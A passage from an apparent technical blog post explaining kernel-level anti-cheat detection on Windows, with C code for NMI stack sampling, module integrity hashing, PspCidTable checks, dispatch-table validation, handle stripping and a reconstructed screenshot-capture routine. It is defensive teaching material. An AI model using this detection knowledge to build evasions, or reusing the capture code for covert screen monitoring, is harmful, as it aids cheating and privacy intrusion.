    context-&gt;kthread         = PsGetCurrentThread();
    context-&gt;callback_count++;

    DEBUG_VERBOSE(
        <span class="hljs-string">"[NMI CALLBACK]: Core Number: %lx, Interrupted RIP: %llx, Interrupted RSP: %llx"</span>,
        core,
        machine_frame-&gt;rip,
        machine_frame-&gt;rsp);

    <span class="hljs-keyword">return</span> TRUE;
}
</code></pre>
<p>The interrupted RIP and RSP are stored in the context. The current thread is obtained using <code>PsGetCurrentThread</code> and stored in the context's <code>kthread</code> field. The <code>callback_count</code> is incremented to keep track of the number of times this callback has been invoked. To determine the validity of an instruction pointer, we can check whether the captured instruction pointer (RIP) falls within an invalid region, indicating potential tampering.</p>
<pre><code class="lang-c"><span class="hljs-function">BOOLEAN
<span class="hljs-title">IsInstructionPointerInInvalidRegion</span><span class="hljs-params">(_In_ UINT64          RIP,
                                    _In_ PSYSTEM_MODULES SystemModules)</span>
</span>{
    PAGED_CODE();

    PRTL_MODULE_EXTENDED_INFO modules =
        (PRTL_MODULE_EXTENDED_INFO)SystemModules-&gt;address;

    <span class="hljs-keyword">for</span> (INT index = <span class="hljs-number">0</span>; index &lt; SystemModules-&gt;module_count; index++) {
        UINT64 base = (UINT64)modules[index].ImageBase;
        UINT64 end  = base + modules[index].ImageSize;

        <span class="hljs-keyword">if</span> (RIP &gt;= base &amp;&amp; RIP &lt;= end) {
            <span class="hljs-keyword">return</span> FALSE;
        }
    }

    <span class="hljs-keyword">return</span> TRUE;
}
</code></pre>
<h2 id="heading-memory-section-integrity-checks">Memory Section Integrity Checks</h2>
<p>Cheaters often attempt to modify game code or system modules and we can also detect these attempts by making sure that the executable code in memory matches the original, untampered code.</p>
<p>Once we have obtained the information of the modules, we can store it to its executable sections into a buffer for further analysis. We can do this by iterating through the module's sections, identifying and copying the executable sections into a buffer.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS <span class="hljs-title">StoreModuleExecutableRegionsInBuffer</span><span class="hljs-params">(_Out_ PVOID* Buffer,
                                              _In_ PVOID ModuleBase,
                                              _In_ SIZE_T ModuleSize,
                                              _Out_ PSIZE_T BytesWritten,
                                              _In_ BOOLEAN IsModulex86)</span> </span>{
    <span class="hljs-keyword">if</span> (!ModuleBase || !ModuleSize)
        <span class="hljs-keyword">return</span> STATUS_INVALID_PARAMETER;
    <span class="hljs-keyword">if</span> (!IsModuleAddressSafe(ModuleBase, IsModulex86))
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;

    *BytesWritten = <span class="hljs-number">0</span>;
    *Buffer = ImpExAllocatePool2(POOL_FLAG_NON_PAGED,
                                 ModuleSize + <span class="hljs-keyword">sizeof</span>(INTEGRITY_CHECK_HEADER),
                                 POOL_TAG_INTEGRITY);
    <span class="hljs-keyword">if</span> (*Buffer == <span class="hljs-literal">NULL</span>)
        <span class="hljs-keyword">return</span> STATUS_MEMORY_NOT_ALLOCATED;

    nt_header = PeGetNtHeader(ModuleBase);
    num_sections = GetSectionCount(nt_header);
    section = IMAGE_FIRST_SECTION(nt_header);
    buffer_base = (UINT64)*Buffer + <span class="hljs-keyword">sizeof</span>(INTEGRITY_CHECK_HEADER);

    <span class="hljs-keyword">for</span> (ULONG index = <span class="hljs-number">0</span>; index &lt; num_sections - <span class="hljs-number">1</span>; index++) {
        <span class="hljs-keyword">if</span> (!IsSectionExecutable(section)) {
            section++;
            <span class="hljs-keyword">continue</span>;
        }
        address.VirtualAddress = section;
        status = ImpMmCopyMemory((UINT64)buffer_base + total_packet_size,
                                 address,
                                 <span class="hljs-keyword">sizeof</span>(IMAGE_SECTION_HEADER),
                                 MM_COPY_MEMORY_VIRTUAL,
                                 &amp;bytes_returned);
        <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
            ImpExFreePoolWithTag(*Buffer, POOL_TAG_INTEGRITY);
            *Buffer = <span class="hljs-literal">NULL</span>;
            <span class="hljs-keyword">return</span> status;
        }
        address.VirtualAddress = (UINT64)ModuleBase + section-&gt;PointerToRawData;
        status = ImpMmCopyMemory((UINT64)buffer_base + total_packet_size +
                                     <span class="hljs-keyword">sizeof</span>(IMAGE_SECTION_HEADER),
                                 address,
                                 section-&gt;SizeOfRawData,
                                 MM_COPY_MEMORY_VIRTUAL,
                                 &amp;bytes_returned);
        <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
            ImpExFreePoolWithTag(*Buffer, POOL_TAG_INTEGRITY);
            *Buffer = <span class="hljs-literal">NULL</span>;
            <span class="hljs-keyword">return</span> status;
        }
        total_packet_size += GetSectionTotalPacketSize(section);
        num_executable_sections++;
        section++;
    }
    InitIntegrityCheckHeader(&amp;header, num_executable_sections, total_packet_size);
    RtlCopyMemory(*Buffer, &amp;header, <span class="hljs-keyword">sizeof</span>(INTEGRITY_CHECK_HEADER));
    *BytesWritten = total_packet_size + <span class="hljs-keyword">sizeof</span>(INTEGRITY_CHECK_HEADER);
    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>We first check check if a section is executable, and then if true we copy the section headers and their content into a buffer. The buffer now contains all the executable sections of the module, which will be used for integrity verification. The next crucial step is to map the disk image of the module into the virtual address space. This allows the integrity checker to access the module's original, unmodified state directly from the disk.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS <span class="hljs-title">MapDiskImageIntoVirtualAddressSpace</span><span class="hljs-params">(_Inout_ PHANDLE SectionHandle,
                                             _Out_ PVOID* Section,
                                             _In_ PUNICODE_STRING Path,
                                             _Out_ PSIZE_T Size)</span> </span>{
    HANDLE file_handle = <span class="hljs-literal">NULL</span>;
    OBJECT_ATTRIBUTES object_attributes = {<span class="hljs-number">0</span>};
    UNICODE_STRING path = {<span class="hljs-number">0</span>};
    *Section = <span class="hljs-literal">NULL</span>;
    *Size = <span class="hljs-number">0</span>;
    ImpRtlInitUnicodeString(&amp;path, Path-&gt;Buffer);
    InitializeObjectAttributes(&amp;object_attributes, &amp;path, OBJ_KERNEL_HANDLE, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>);
    status = ImpZwOpenFile(&amp;file_handle, GENERIC_READ, &amp;object_attributes, &amp;pio_block, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>);
    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        <span class="hljs-keyword">return</span> status;
    }
    object_attributes.ObjectName = <span class="hljs-literal">NULL</span>;
    status = ImpZwCreateSection(SectionHandle, SECTION_ALL_ACCESS, &amp;object_attributes, <span class="hljs-literal">NULL</span>, PAGE_READONLY, SEC_IMAGE, file_handle);
    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        ImpZwClose(file_handle);
        *SectionHandle = <span class="hljs-literal">NULL</span>;
        <span class="hljs-keyword">return</span> status;
    }
    status = ImpZwMapViewOfSection(*SectionHandle, ZwCurrentProcess(), Section, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, Size, ViewUnmap, MEM_TOP_DOWN, PAGE_READONLY);
    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        ImpZwClose(file_handle);
        ImpZwClose(*SectionHandle);
        *SectionHandle = <span class="hljs-literal">NULL</span>;
        <span class="hljs-keyword">return</span> status;
    }
    ImpZwClose(file_handle);
    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>After mapping the disk image, we can recall the storing function but this time with the disk image as the source. This ensures that we have a buffer containing the executable sections from the disk image, which can be directly compared to the in-memory buffer.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS <span class="hljs-title">ComputeHashOfSections</span><span class="hljs-params">(_In_ PIMAGE_SECTION_HEADER DiskSection,
                               _In_ PIMAGE_SECTION_HEADER MemorySection,
                               _Out_ PVOID* DiskHash,
                               _Out_ PULONG DiskHashSize,
                               _Out_ PVOID* MemoryHash,
                               _Out_ PULONG MemoryHashSize)</span> </span>{
    <span class="hljs-keyword">if</span> (DiskSection-&gt;SizeOfRawData != MemorySection-&gt;SizeOfRawData) {
        <span class="hljs-keyword">return</span> STATUS_INVALID_BUFFER_SIZE;
    }
    status = ComputeHashOfBuffer((UINT64)DiskSection + <span class="hljs-keyword">sizeof</span>(IMAGE_SECTION_HEADER),
                                 DiskSection-&gt;SizeOfRawData,
                                 DiskHash,
                                 DiskHashSize);
    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        <span class="hljs-keyword">return</span> status;
    }
    status = ComputeHashOfBuffer((UINT64)MemorySection + <span class="hljs-keyword">sizeof</span>(IMAGE_SECTION_HEADER),
                                 MemorySection-&gt;SizeOfRawData,
                                 MemoryHash,
                                 MemoryHashSize);
    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>We check if the sizes of the sections match before computing their hashes, then generate the SHA-256 hashes of the section contents. Finally, we can compare the two results. If the hashes do not match, it indicates that the in-memory section has been modified and we can trigger an integrity violation.</p>
<pre><code class="lang-c"><span class="hljs-function">FORCEINLINE
STATIC
BOOLEAN
<span class="hljs-title">CompareHashes</span><span class="hljs-params">(_In_ PVOID Hash1, _In_ PVOID Hash2, _In_ UINT32 Length)</span> </span>{
    <span class="hljs-keyword">return</span> RtlCompareMemory(Hash1, Hash2, Length) == Length ? TRUE : FALSE;
}
</code></pre>
<h2 id="heading-detection-of-pspcidtable-entry-detection-removal">Detection of <code>PspCidTable</code> Entry Detection Removal</h2>
<p>The <code>PspCidTable</code> (Process Structure CID Table) is a critical data structure in the Windows kernel that maintains mappings of process and thread IDs to their respective structures. By removing or modifying entries in this table, a cheat can effectively hide its own threads and processes from system monitoring tools. This makes it difficult for anticheat systems to detect the presence of the cheat software.</p>
<p>Previously, we captured the state of the interrupted thread and stores the relevant information in the <code>NMI_CONTEXT</code> structure. This includes the <code>kthread</code> pointer, which points to the current thread's kernel structure. We can in turn use this to detecting removed thread <code>PspCidTable</code> entries is crucial for identifying malicious activities that attempt to hide the presence of threads from the operating system.</p>
<p>After capturing the thread context via NMI, the <code>AnalyseNmiData</code> function is used to validate the presence of each thread in the <code>PspCidTable</code>. The function iterates through each core's <code>NMI_CONTEXT</code> and checks if the captured thread is listed in the <code>PspCidTable</code>.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">AnalyseNmiData</span><span class="hljs-params">(_In_ PNMI_CONTEXT NmiContext, _In_ PSYSTEM_MODULES SystemModules)</span>
</span>{
    PAGED_CODE();

    NTSTATUS status = STATUS_UNSUCCESSFUL;

    <span class="hljs-keyword">if</span> (!NmiContext || !SystemModules)
        <span class="hljs-keyword">return</span> STATUS_INVALID_PARAMETER;

    <span class="hljs-keyword">for</span> (INT core = <span class="hljs-number">0</span>; core &lt; ImpKeQueryActiveProcessorCount(<span class="hljs-number">0</span>); core++) {
        <span class="hljs-keyword">if</span> (!NmiContext[core].callback_count) {
            ReportNmiBlocking();
            <span class="hljs-keyword">return</span> STATUS_SUCCESS;
        }

        DEBUG_VERBOSE(
            <span class="hljs-string">"Analysing Nmi Data for: cpu number: %i callback count: %lx"</span>,
            core,
            NmiContext[core].callback_count);

        <span class="hljs-keyword">if</span> (!DoesThreadHaveValidCidEntry(NmiContext[core].kthread)) {
            ReportMissingCidTableEntry(&amp;NmiContext[core]);
        }

        <span class="hljs-keyword">if</span> (NmiContext[core].user_thread)
            <span class="hljs-keyword">continue</span>;

        <span class="hljs-keyword">if</span> (IsInstructionPointerInInvalidRegion(
                NmiContext[core].interrupted_rip, SystemModules))
            ReportInvalidRipFoundDuringNmi(&amp;NmiContext[core]);
    }

    <span class="hljs-keyword">return</span> STATUS_SUCCESS;
}
</code></pre>
<p>We can then verify if the thread has a valid entry in the <code>PspCidTable</code>. If the thread is not found in the <code>PspCidTable</code>, it indicates that the thread might have been hidden or unlinked, which is a common technique used by cheat programs to avoid detection.</p>
<h2 id="heading-directx-graphics-kernel-monitoring">DirectX Graphics Kernel Monitoring</h2>
<p>The <code>gDxgkInterface</code> table is part of the Windows graphics subsystem, specifically used by the DirectX Graphics Kernel (<code>dxgkrnl.sys</code>). By hooking into these interfaces, cheaters can manipulate the graphics rendering pipeline to achieve various forms of cheating, such as:</p>
<ul>
<li><p><strong>Wallhacks</strong>: Allowing players to see through walls by modifying how graphics are rendered, making certain objects transparent or highlighting players through walls.</p>
</li>
<li><p><strong>Aimbots</strong>: Automatically aiming at targets by altering the input handling routines.</p>
</li>
<li><p><strong>ESP (Extrasensory Perception)</strong>: Displaying additional information on the screen, such as player names, health, and locations.</p>
</li>
</ul>
<p>Monitoring this kernel involves creating a routine validation for <code>Win32kBase_DxgInterface</code> that ensure that the functions within the <code>gDxgkInterface</code> table are legitimate and reside within valid memory regions.</p>
<p>We first start by searching for the <code>win32kbase.sys</code> and <code>dxgkrnl.sys</code> modules.</p>
<pre><code class="lang-c"><span class="hljs-function">PRTL_MODULE_EXTENDED_INFO <span class="hljs-title">FindModuleByName</span><span class="hljs-params">(_In_ PSYSTEM_MODULES Modules, _In_ PCHAR ModuleName)</span> </span>{
    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; Modules-&gt;module_count; index++) {
        PRTL_MODULE_EXTENDED_INFO entry =
            &amp;((PRTL_MODULE_EXTENDED_INFO)(Modules-&gt;address))[index];
        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strstr</span>(entry-&gt;FullPathName, ModuleName))
            <span class="hljs-keyword">return</span> entry;
    }

    <span class="hljs-keyword">return</span> <span class="hljs-literal">NULL</span>;
}
</code></pre>
<p>We can then attach to the <code>winlogon</code> process context using <code>KeStackAttachProcess</code>, which allows for safely accessing and manipulating user-mode memory within a kernel-mode context. Within this context, the function locates the <code>gDxgkInterface</code> table in the <code>win32kbase.sys</code>.</p>
<pre><code class="lang-c">KeStackAttachProcess(winlogon, &amp;apc);
dxg_interface = PeFindExportByName(win32kbase-&gt;ImageBase, <span class="hljs-string">"gDxgkInterface"</span>);

<span class="hljs-keyword">if</span> (!dxg_interface) {
    status = STATUS_UNSUCCESSFUL;
    <span class="hljs-keyword">goto</span> detatch;
}
</code></pre>
<p>The entries in <code>gDxgkInterface</code> are then iterated over, starting from the fourth entry (the first three entries are housekeeping).</p>
<pre><code class="lang-c"><span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">3</span>; index &lt; WIN32KBASE_DXGKRNL_INTERFACE_FUNC_COUNT + <span class="hljs-number">3</span>; index++) {
    <span class="hljs-keyword">if</span> (!dxg_interface[index])
        <span class="hljs-keyword">continue</span>;

    PVOID entry = FindChainedPointerEnding(dxg_interface[index]);
</code></pre>
<p>We then follow the chain of pointers, ensuring each is valid, and returns the final pointer. Each entry is then validated to ensure it resides within the <code>dxgkrnl.sys</code> module's memory region.</p>
<pre><code class="lang-c"><span class="hljs-function">PVOID <span class="hljs-title">FindChainedPointerEnding</span><span class="hljs-params">(_In_ PVOID* Start)</span> </span>{
    PVOID* current = *Start;
    PVOID  prev    = Start;

    <span class="hljs-keyword">while</span> (IsValidKernelAddress(current)) {
        __try {
            prev    = current;
            current = *current;
        }
        __except (EXCEPTION_EXECUTE_HANDLER) {
            <span class="hljs-keyword">return</span> prev;
        }
    }

    <span class="hljs-keyword">return</span> prev;
}
</code></pre>
<h2 id="heading-hal-dispatch-table-validation">HAL Dispatch Table Validation</h2>
<p><code>HalDispatch</code> and <code>HalPrivateDispatch</code> are structures in the Windows operating system kernel that contain function pointers to various hardware abstraction layer (HAL) routines. These tables are critical for the operation of the HAL, which abstracts hardware-specific details from the rest of the operating system, providing a consistent interface for hardware interaction. As these structures contain pointers to essential HAL functions that manage hardware resources, <a target="_blank" href="https://revers.engineering/fun-with-pg-compliant-hook/">cheats can work by hooking into these structures</a>.</p>
<p>For <code>HalDispatch</code>, we can iterates through predefined function pointers, verifying if they reside within valid kernel memory regions.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC VOID <span class="hljs-title">ValidateHalDispatchTable</span><span class="hljs-params">(_Out_ PVOID* Routine, _In_ PSYSTEM_MODULES Modules)</span> </span>{
    *Routine = <span class="hljs-literal">NULL</span>;
    DEBUG_VERBOSE(<span class="hljs-string">"Validating HalDispatchTable."</span>);

    <span class="hljs-keyword">if</span> (IsInstructionPointerInInvalidRegion(HalQuerySystemInformation, Modules)) {
        *Routine = HalQuerySystemInformation;
        <span class="hljs-keyword">goto</span> end;
    }

    <span class="hljs-keyword">if</span> (IsInstructionPointerInInvalidRegion(HalSetSystemInformation, Modules)) {
        *Routine = HalSetSystemInformation;
        <span class="hljs-keyword">goto</span> end;
    }

    <span class="hljs-comment">// ...</span>

end:
    <span class="hljs-keyword">return</span>;
}
</code></pre>
<p>We can checks if the instruction pointer (<code>HalQuerySystemInformation</code>, <code>HalSetSystemInformation</code>, etc.) is within a valid region of memory. If any pointer is found to be invalid, it sets the <code>Routine</code> pointer to the invalid function and exits. Each function pointer in the <code>HalDispatchTable</code> is validated sequentially.</p>
<p>But for <code>HalPrivateDispatchTable</code> this task is abit more difficult, as its not as well documented as <code>HalDispatch</code> because its reserved for hardware-specific functions that are not exposed through standard HAL interfaces. This table is also slightly more complex because <a target="_blank" href="https://www.vergiliusproject.com/kernels/x64/Windows%2011/22H2%20\(2022%20Update\)/HAL_PRIVATE_DISPATCH">its size varies</a> depending on the Windows version.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC NTSTATUS <span class="hljs-title">ValidateHalPrivateDispatchTable</span><span class="hljs-params">(_Out_ PVOID* Routine, _In_ PSYSTEM_MODULES Modules)</span> </span>{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    PVOID table = <span class="hljs-literal">NULL</span>;
    UNICODE_STRING <span class="hljs-built_in">string</span> = RTL_CONSTANT_STRING(<span class="hljs-string">L"HalPrivateDispatchTable"</span>);
    PVOID* base = <span class="hljs-literal">NULL</span>;
    RTL_OSVERSIONINFOW os_info = {<span class="hljs-number">0</span>};
    UINT32 count = <span class="hljs-number">0</span>;

    DEBUG_VERBOSE(<span class="hljs-string">"Validating HalPrivateDispatchTable."</span>);

    table = ImpMmGetSystemRoutineAddress(&amp;<span class="hljs-built_in">string</span>);

    <span class="hljs-keyword">if</span> (!table) <span class="hljs-keyword">return</span> status;

    status = GetOsVersionInformation(&amp;os_info);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"GetOsVersionInformation failed with status %x"</span>, status);
        <span class="hljs-keyword">return</span> status;
    }

    base  = (UINT64)table + <span class="hljs-keyword">sizeof</span>(UINT64);
    count = GetHalPrivateDispatchTableRoutineCount(&amp;os_info);

    ValidateTableDispatchRoutines(base, count, Modules, Routine);
    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>We can first retrieve the address of the <code>HalPrivateDispatchTable</code>, then determine the number of entries in the table based on the OS version, obtained by calling <code>GetOsVersionInformation</code>. The routine count is computed by <code>GetHalPrivateDispatchTableRoutineCount</code>, which checks the OS build number and returns the appropriate size.</p>
<p>Then we can do the same and iterate through each entry in the <code>HalPrivateDispatchTable</code>, checking if each instruction pointer resides within a valid memory region. If an invalid pointer is found, it sets the <code>Routine</code> pointer to this invalid function.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC VOID <span class="hljs-title">ValidateTableDispatchRoutines</span><span class="hljs-params">(_In_ PVOID* Base, _In_ UINT32 Entries, _In_ PSYSTEM_MODULES Modules, _Out_ PVOID* Routine)</span> </span>{
    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; Entries; index++) {
        <span class="hljs-keyword">if</span> (!Base[index]) <span class="hljs-keyword">continue</span>;

        <span class="hljs-keyword">if</span> (IsInstructionPointerInInvalidRegion(Base[index], Modules))
            *Routine = Base[index];
    }
}
</code></pre>
<h2 id="heading-handle-stripping-via-object-callbacks">Handle Stripping via Object Callbacks</h2>
<p>Cheat programs often try to open handles to game processes to read or write memory, inject code, or manipulate the game's execution. By intercepting handle creation and duplication requests through object callbacks, the anti-cheat driver can inspect these requests and deny access if they are deemed unauthorized.</p>
<p>By stripping handles and denying unauthorized access, the anti-cheat driver ensures that the game process and other related processes maintain their integrity. We can start by registering callback routines for process and thread objects.</p>
<pre><code class="lang-c">OB_CALLBACK_REGISTRATION callbackRegistration;
OB_OPERATION_REGISTRATION operationRegistration[<span class="hljs-number">1</span>];

RtlZeroMemory(&amp;callbackRegistration, <span class="hljs-keyword">sizeof</span>(OB_CALLBACK_REGISTRATION));
RtlZeroMemory(&amp;operationRegistration, <span class="hljs-keyword">sizeof</span>(OB_OPERATION_REGISTRATION));

operationRegistration[<span class="hljs-number">0</span>].ObjectType = PsProcessType;
operationRegistration[<span class="hljs-number">0</span>].Operations = OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE;
operationRegistration[<span class="hljs-number">0</span>].PreOperation = ObPreOpCallbackRoutine;
operationRegistration[<span class="hljs-number">0</span>].PostOperation = ObPostOpCallbackRoutine;

callbackRegistration.Version = OB_FLT_REGISTRATION_VERSION;
callbackRegistration.OperationRegistrationCount = <span class="hljs-number">1</span>;
callbackRegistration.Altitude = <span class="hljs-string">L"320000"</span>;
callbackRegistration.RegistrationContext = <span class="hljs-literal">NULL</span>;
callbackRegistration.OperationRegistration = operationRegistration;

NTSTATUS status = ObRegisterCallbacks(&amp;callbackRegistration, &amp;callbackHandle);
<span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
    <span class="hljs-comment">// handle errors</span>
}
</code></pre>
<p>Then we need to check if the object type is a process and if the operation is handle creation or duplication. After that we need to inspect the handle attributes to determine if the handle request is unauthorized. If it is, we strip the handle by modifying the desired access rights.</p>
<pre><code class="lang-c"><span class="hljs-function">OB_PREOP_CALLBACK_STATUS <span class="hljs-title">ObPreOpCallbackRoutine</span><span class="hljs-params">(
    PVOID RegistrationContext,
    POB_PRE_OPERATION_INFORMATION OperationInformation)</span>
</span>{
    PAGED_CODE();

    UNREFERENCED_PARAMETER(RegistrationContext);

    ACCESS_MASK deny_access = SYNCHRONIZE | PROCESS_TERMINATE;

    PEPROCESS process_creator = PsGetCurrentProcess();
    PEPROCESS target_process = (PEPROCESS)OperationInformation-&gt;Object;
    HANDLE process_creator_id = ImpPsGetProcessId(process_creator);
    LPCSTR process_creator_name = ImpPsGetProcessImageFileName(process_creator);
    LPCSTR target_process_name = ImpPsGetProcessImageFileName(target_process);

    <span class="hljs-keyword">if</span> (!process_creator_name || !target_process_name)
        <span class="hljs-keyword">return</span> OB_PREOP_SUCCESS;

    <span class="hljs-comment">// check if the process is whitelisted</span>
    <span class="hljs-keyword">if</span> (IsWhitelistedHandleOpenProcess(process_creator_name) ||
        !<span class="hljs-built_in">strcmp</span>(process_creator_name, target_process_name)) {
        <span class="hljs-keyword">return</span> OB_PREOP_SUCCESS;
    }

    <span class="hljs-comment">// deny access if the process is not whitelisted</span>
    OperationInformation-&gt;Parameters-&gt;CreateHandleInformation.DesiredAccess = deny_access;
    OperationInformation-&gt;Parameters-&gt;DuplicateHandleInformation.DesiredAccess = deny_access;

    <span class="hljs-keyword">return</span> OB_PREOP_SUCCESS;
}
</code></pre>
<p>But in targeting these specific processes, we also want to exclude certain processes from being terminated. Common user installed programs like Discord and Steam, or essential Windows services should be whitelisted to avoid system instability.</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> PROCESS_HANDLE_OPEN_WHITELIST_COUNT 3</span>

CHAR PROCESS_HANDLE_OPEN_WHITELIST[PROCESS_HANDLE_OPEN_WHITELIST_COUNT]
                                  [MAX_PROCESS_NAME_LENGTH] = {<span class="hljs-string">"Discord.exe"</span>,
                                                               <span class="hljs-string">"svchost.exe"</span>,
                                                               <span class="hljs-string">"explorer.exe"</span>};

<span class="hljs-function">STATIC
BOOLEAN
<span class="hljs-title">IsWhitelistedHandleOpenProcess</span><span class="hljs-params">(_In_ LPCSTR ProcessName)</span>
</span>{
    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; PROCESS_HANDLE_OPEN_WHITELIST_COUNT;
         index++) {
        <span class="hljs-keyword">if</span> (!<span class="hljs-built_in">strcmp</span>(ProcessName, PROCESS_HANDLE_OPEN_WHITELIST[index]))
            <span class="hljs-keyword">return</span> TRUE;
    }

    <span class="hljs-keyword">return</span> FALSE;
}
</code></pre>
<h2 id="heading-screenshot-gathering">Screenshot Gathering</h2>
<p>This is probably one of the most egregious cases of anticheat overreach and is probably what comes to mind when people talk about kernel level anticheats. The most popular example of this when <a target="_blank" href="https://x.com/w_sted">@w_sted</a> found out Valorant is taking full display screenshots of user devices, but this was subsequently debunked by <a target="_blank" href="https://x.com/daaximus/status/1786224313223323726">@daaximus</a> who said screenshotting only occurs on active windows (aka, only the game).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1719045805549/ba4ad5bb-99c5-425d-b669-68f59dab246a.png" alt class="image--center mx-auto" /></p>
<p>In the context of a kernel-level anti-cheat system, this code is designed to capture screenshots of a user's desktop or a specific window at regular intervals, likely for the purpose of monitoring and ensuring the integrity of the gameplay environment. The code includes functionalities to minimize or hide the capture window under certain conditions, like when the user presses specific keys, which is common in anti-cheat mechanisms to prevent tampering.</p>
<p>Impressively, <a target="_blank" href="https://x.com/daaximus/status/1786224313223323726">@daaximus</a> provided the full approximate recreation of the function based on the reverse engineered snippet. The core of the implementation revolves around GDI+ for capturing and saving screenshots. The GDI+ library is initialized at the beginning of the screenshot capture function to facilitate image encoding and saving in PNG format.</p>
<pre><code class="lang-c">GdiplusStartupInput gdipsi;
ULONG_PTR token;
GdiplusStartup(&amp;token, &amp;gdipsi, <span class="hljs-literal">nullptr</span>);
</code></pre>
<p>The <code>get_encoder_clsid</code> function fetches the CLSID of the image encoder for PNG files, which is necessary for saving the captured images in the correct format. This function iterates through the available image encoders and matches the requested format to return the appropriate CLSID.</p>
<pre><code class="lang-c"><span class="hljs-function">cppCopy codeint <span class="hljs-title">get_encoder_clsid</span><span class="hljs-params">(<span class="hljs-keyword">const</span> WCHAR* format, CLSID* clsid)</span> </span>{
    UINT num_encoders = <span class="hljs-number">0</span>;
    UINT size_encoders = <span class="hljs-number">0</span>;
    ImageCodecInfo* codec_info = <span class="hljs-literal">nullptr</span>;
    GetImageEncodersSize(&amp;num_encoders, &amp;size_encoders);

    <span class="hljs-keyword">if</span> (size_encoders == <span class="hljs-number">0</span>) <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;

    codec_info = <span class="hljs-keyword">static_cast</span>&lt;ImageCodecInfo*&gt;(<span class="hljs-built_in">malloc</span>(size_encoders));

    <span class="hljs-keyword">if</span> (codec_info == <span class="hljs-literal">nullptr</span>) <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;

    GetImageEncoders(num_encoders, size_encoders, codec_info);

    <span class="hljs-keyword">for</span> (UINT it = <span class="hljs-number">0</span>; it &lt; num_encoders; ++it) {
        <span class="hljs-keyword">if</span> (wcscmp(codec_info[it].MimeType, format) == <span class="hljs-number">0</span>) {
            *clsid = codec_info[it].Clsid;
            <span class="hljs-built_in">free</span>(codec_info);
            <span class="hljs-keyword">return</span> it;
        }
    }
    <span class="hljs-built_in">free</span>(codec_info);
    <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;
}
</code></pre>
<p>The <code>capture_screenshot</code> function takes a file name and an optional window handle (<code>hwnd</code>). It determines the screen dimensions to capture, either the entire virtual screen or the dimensions of the specified window. The function creates a compatible bitmap and device context to store the captured screen content.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">capture_screenshot</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-built_in">std</span>::<span class="hljs-built_in">wstring</span>&amp; filename, HWND hwnd)</span> </span>{
    <span class="hljs-keyword">const</span> HDC hdc_screen = GetDC(<span class="hljs-literal">nullptr</span>);
    <span class="hljs-keyword">const</span> HDC hdc_capture = CreateCompatibleDC(hdc_screen);

    <span class="hljs-keyword">int</span> left = GetSystemMetrics(SM_XVIRTUALSCREEN);
    <span class="hljs-keyword">int</span> top = GetSystemMetrics(SM_YVIRTUALSCREEN);
    <span class="hljs-keyword">int</span> width = GetSystemMetrics(SM_CXVIRTUALSCREEN);
    <span class="hljs-keyword">int</span> height = GetSystemMetrics(SM_CYVIRTUALSCREEN);

    <span class="hljs-keyword">if</span> (hwnd != <span class="hljs-literal">nullptr</span>) {
        RECT window_rect;
        GetWindowRect(hwnd, &amp;window_rect);
        left = window_rect.left;
        top = window_rect.top;
        width = window_rect.right - window_rect.left;
        height = window_rect.bottom - window_rect.top;
    }

    <span class="hljs-keyword">const</span> HBITMAP hbm = CreateCompatibleBitmap(hdc_screen, width, height);
    SelectObject(hdc_capture, hbm);
    BitBlt(hdc_capture, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, width, height, hdc_screen, left, top, SRCCOPY);

    Bitmap* bitmap = Bitmap::FromHBITMAP(hbm, <span class="hljs-literal">nullptr</span>);

    CLSID png_clsid;
    get_encoder_clsid(<span class="hljs-string">L"image/png"</span>, &amp;png_clsid);

    bitmap-&gt;Save(filename.c_str(), &amp;png_clsid, <span class="hljs-literal">nullptr</span>);

    <span class="hljs-keyword">delete</span> bitmap;
    DeleteObject(hbm);
    DeleteDC(hdc_capture);
    ReleaseDC(<span class="hljs-literal">nullptr</span>, hdc_screen);
    GdiplusShutdown(token);
}
</code></pre>
<p>The application includes a custom window procedure (<code>window_proc</code>) to handle various Windows messages. This procedure ensures that the capture window minimizes or hides itself under certain conditions, such as when the user presses the Alt+Tab combination or the Windows key. This behavior prevents the window from interfering with the user's actions and hides the presence of the anti-cheat mechanism.</p>
